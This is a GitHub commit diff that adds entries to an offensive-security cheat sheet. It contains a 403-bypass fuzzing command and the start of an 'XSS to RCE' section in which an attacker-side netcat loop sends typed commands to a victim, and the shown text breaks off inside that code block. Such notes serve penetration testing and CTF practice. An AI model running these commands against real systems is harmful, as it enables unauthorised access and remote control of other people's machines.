Update Cheat Sheet.md

This commit is contained in:
ARZ 2021-02-13 23:39:31 +05:00 committed by GitHub
parent cd30deea50
commit 22f00caf88
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -221,6 +221,13 @@ run getgui -u [USER_NAME] -p [PASS]
`./extractor.sh <location_folder_having_.git_init> <extract_to_a_folder>`
# Web
### 403 By pass
https://github.com/intrudir/403fuzzer <br />
`python3 403fuzzer.py -hc 403 -u http://<ip>/page_that_you_want_to_bypass(which is usally a 403 foribben)`
### XSS to RCE
```
Attacker: while :; do printf "j$ "; read c; echo $c | nc -lp PORT >/dev/null; done